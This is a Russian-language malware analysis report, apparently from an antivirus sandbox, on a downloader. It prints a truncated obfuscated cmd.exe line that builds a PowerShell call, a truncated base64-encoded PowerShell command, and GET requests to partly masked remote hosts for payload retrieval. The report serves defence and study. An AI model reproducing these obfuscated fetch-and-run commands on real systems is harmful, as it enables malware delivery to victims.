Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /v /c "set %cDpiTrLVN%=wers&&set %SuZmiriSa%=JwsADfCTs&&set %KlsJVlijz%=po&&set %qfSAwAXEM%=MrqzTiJDT&&set %PqjuFnVOr%=hell&&set %SqYwAARBW%=VcQFWjpkv&&!%KlsJVlijz%!!%cDpiTrLVN%!!%P...
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %TEMP%\27162.exe
Удаляет следующие файлы
- %TEMP%\27162.exe
Сетевая активность
Подключается к
- 'ag####inaction.de':80
- 'ed##net.de':80
- 'my####ngagent.com':80
- 'ma#####fleischmann.de':80
- 'ad######ratiekantoorcleo.nl':80
TCP
Запросы HTTP GET
- http://ag####inaction.de/NYkSf/
- http://ed##net.de/r/
- http://my####ngagent.com/SkAU/
- http://www.my####ngagent.com/SkAU/
- http://ma#####fleischmann.de/vWg/
- http://ad######ratiekantoorcleo.nl/tBf/
UDP
- DNS ASK ag####inaction.de
- DNS ASK ed##net.de
- DNS ASK my####ngagent.com
- DNS ASK ma#####fleischmann.de
- DNS ASK ad######ratiekantoorcleo.nl
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAgACgAKAB2AEEAUgBpAEEAYgBMAGUAIAAnACoAbQBEAFIAKgAnACkALgBuAGEAbQBFAFsAMwAsADEAMQAsADIAXQAtAEoATwBJAG4AJwAnACkAIAAoACgAJwAzADYAOgAxADEAOQB6ADEAMQA1AG0AOQA5AH4AMQAxADQAWQAxADAANQB+ADEAMQAyAC...
- '<SYSTEM32>\cmd.exe' /v /c "set %cDpiTrLVN%=wers&&set %SuZmiriSa%=JwsADfCTs&&set %KlsJVlijz%=po&&set %qfSAwAXEM%=MrqzTiJDT&&set %PqjuFnVOr%=hell&&set %SqYwAARBW%=VcQFWjpkv&&!%KlsJVlijz%!!%cDpiTrLVN%!!%P... (со скрытым окном)
